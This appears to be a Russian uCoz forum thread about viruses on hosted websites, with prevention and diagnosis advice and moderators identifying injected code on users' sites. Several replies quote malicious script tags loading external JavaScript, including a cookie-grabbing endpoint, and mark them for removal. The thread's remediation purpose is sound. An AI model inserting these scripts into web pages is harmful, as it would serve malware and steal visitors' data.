Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    SeSh@
    Сообщений: 30
    Репутация: -15
    Уровень замечаний:

    Сообщение # 1231 | 12:32:39 04 Апр 2014
    Спасибо огромное, дома попробую
    RasT1907
    Сообщений: 19
    Репутация: 0

    Сообщение # 1232 | 10:36:50 05 Апр 2014
    ДОБРОГО ДНЯ! Как найти вирусы на сайте (http://fylm.org/) и убрать их? вроде все удалил шаблон переустановил! яндекс блокирует сайт! зарание спасибо
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1233 | 10:43:17 05 Апр 2014
    
    Цитата
    Вредоносный код:
    • обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;


    http://yandex.ru/infected?url=fylm.org

    После очистки запросите перепроверку, если при следующей проверке код не будет обнаружен, Яндекс перестанет размечать сайт в результатах поиска как опасный.
    RasT1907
    Сообщений: 19
    Репутация: 0

    Сообщение # 1234 | 10:55:31 05 Апр 2014
    нету не каких кодов одно видео онлайн! что делать? даже в ПУ зайти не могу!
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1235 | 11:29:21 05 Апр 2014
    RasT1907, вы противоречите сами себе.

    Цитата RasT1907 ()
    вроде все удалил шаблон переустановил

    Цитата RasT1907 ()
    даже в ПУ зайти не могу

    Воспользуйтесь любым другим браузером. Вход в панель управления http://fylm.org/admin
    Яндекс перестанет размечать сайт в результатах поиска как опасный, только после проверки.
    Яндекс.Вебмастер
    Зарегистрируйте сайт на этом сервисе, чтобы получать оповещения о заражении сайта
    и детальную информацию об опасных страницах, а также иметь возможность
    запустить перепроверку.
    suprunovka
    Сообщений: 2
    Репутация: 0

    Сообщение # 1236 | 13:16:26 05 Апр 2014
    Здравствуйте! Как найти вирусы на сайте (http://supr-school.at.ua) яндекс блокирует сайт (Поведенческий анализ)! заранее спасибо.
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1237 | 14:23:24 05 Апр 2014
    suprunovka, вам необходимо очистить весь контент от мусора. Нежелательно копировать раскрашенный и отформатированный текст из Word

    материалы
    http://supr-school.at.ua/news....-19-200
    http://supr-school.at.ua/news....-15-199
    http://supr-school.at.ua/news....-06-198
    Код
    <script src="https://pluginplus.net/plugins/system/system_ps.js"></script><script src="https://pluginplus.net/plugins/system/system_ps.js"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script>


    материал http://supr-school.at.ua/news/pravova_osvita_uchniv/2013-11-20-196
    suprunovka
    Сообщений: 2
    Репутация: 0

    Сообщение # 1238 | 14:49:00 05 Апр 2014
    Большое спасибо за ответ! и совет!
    r_aleks
    Сообщений: 2
    Репутация: 0

    Сообщение # 1239 | 19:47:27 05 Апр 2014
    Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

    Вы должны предоставить ссылку на сайт!
    Вы должны дать описание проблемы:
    1) на какой странице сайта обнаруживается проблема (ссылка)
    2) проблема обнаруживается только под логином или под гостем тоже
    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки
    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки
    Сообщение отредактировал webanet - Суббота, 05 Апр 2014, 19:48:16
    r_aleks
    Сообщений: 2
    Репутация: 0

    Сообщение # 1240 | 19:56:27 05 Апр 2014
    еще раз попробую
    1. проблема обнаруживается у людей которым даю ссылку например http://offroad81.do.am/_fr/2/2531722.jpg . на запас картинка находится на странице http://offroad81.do.am/forum/13-286-5
    2. под гостем обнаруживается
    3. скриншот блокировки
    Прикрепления: 1497119.png (26.6 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1241 | 20:05:04 05 Апр 2014
    r_aleks, это ложное срабатывание

    Цитата
    Вы как клиент DR.Web можете обратится в их поддержку за разъяснением
    Бесплатный номер техподдержки в России: 8-800-333-7932
    Для звонок в не из РФ +7 (495) 789-45-86 (техподдержка)

    или

    или лучше всего просто сообщите о фолсе по форме https://vms.drweb.com/sendvirus/

    выберите ссылку (дайте ссылку на свой сайт, где происходит блокировка)

    выберите пункт ложное срабатывание

    введите обязательно мейл свой на который получите ответ

    в комментарии напишите это

    ложное срабатывание вердикт URL mal и укажите ссылку на картинку на которую идет срабатывание и ссылку на форум, где картинка висит

    и вот ещё. вам стоит почистить радикально свой каталог сайтов. там пока только грязь, муть и спам. не стоит держать это у себя на сайте
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1242 | 20:12:48 05 Апр 2014
    RasT1907, из формы входа удалить скрипт

    Код
    <script src="http://i1ii.ru/1.js" type="text/javascript"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Admin3913
    Сообщений: 2
    Репутация: 0

    Сообщение # 1243 | 09:02:53 06 Апр 2014
    У меня при входе на сайт ругается АВАСТ , но сайте не нашел ни какого js8xt.ru
    admin6631
    Сообщений: 9
    Репутация: 0

    Сообщение # 1244 | 10:45:25 08 Апр 2014
    Привет всем! Помогите, пожалуйста. Проблема с сайтом http://dolchaika.ru/
    Яндекс вебмастер обнаружил какую-то угрозу. И посетители начали жаловаться, что при открытии сайта всплывает предупреждение о потенциальной угрозе и блокирует страницы. Заранее благодарен.

    Прикрепления: 5853402.png (57.0 Kb)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1245 | 11:11:08 08 Апр 2014
    admin6631, к сожалению вы устроили из сайта скрипто-помойку. а этого делать нельзя

    удалить

    Код
    <SCRIPT src="http://bambun.ru/css_js/strelka_exe.js" type="text/javascript" language="javascript"></SCRIPT>
      <a id="gotop" class="scrollTop" href="#" onclick="top.goTop(); return false;" style="text-align: justify;"><script src="http://xall-pc.ru/up.js" type="text/javascript"></script></a>


    из блока детская музыка удалить скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/03000319/180/220"></script>


    из блока календарь удалить скрипт

    Код
    <script language="JavaScript" src="http://101widgets.com/00004012/180/187"></script>


    Код
    <script src="http://delaisait.ucoz.ru/js/jQuery/mobilyslider.js" type="text/javascript">
    перелить на сайт

    блок с названием блок программ удалить вообще и никогда ничего подобное на сайт не ставить

    окно - просилку авторизироваться и зарегистрироваться полностью уничтожить.

    Код
    <!-- uzzscript type="text/javascript">data = 'Чтобы иметь более широкий доступ на сайте и скачивать файлы, советуем вам зарегистрироваться или войти на сайт как пользователь, это займет менее двух минут. Спасибо!<div style="padding:5px;"><hr><b><a href="/index/3">Регистрация</a> | <a href="/index/1">Вход</a></b></div>';  

    _uWnd.alert(data,'Внимание',{w:290,h:140,tm:30000});//  

    function imgs_okno(){if ($("span.xw-hdr-text").html("<img src='http://bambun.ru/images/7_16kh16.png' border='0' align='absmiddle' alt=''> Внимание")){$("span.xw-hdr-text").html("<img src='http://bambun.ru/images/7_16kh16.png' border='0' align='absmiddle' alt=''> Внимание");}} setTimeout("imgs_okno();",100);</script>--><!-- uzzscript src="http://china-air.ru/tsed.js" type="text/javascript"></script>-->  

    и никогда больше не искать подобное и не ставить

    на главной замените юкозовские ссылки

    Цитата
    <link rel="icon" href="http://dolchaika.ucoz.ru/favicon.ico" type="image/x-icon">
    <link rel="shortcut icon" href="http://dolchaika.ucoz.ru/favicon.ico" type="image/x-icon">


    на ссылки нового домена. вот так
    Код

    <link rel="icon" href="http://dolchaika.ru/favicon.ico" type="image/x-icon">  
    <link rel="shortcut icon" href="http://dolchaika.ru/favicon.ico" type="image/x-icon">


    и старайтесь не устраивать из сайта такую скриптовую грязь. прекратите полностью собирать красоты для сайта. ваш сайт для деток
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: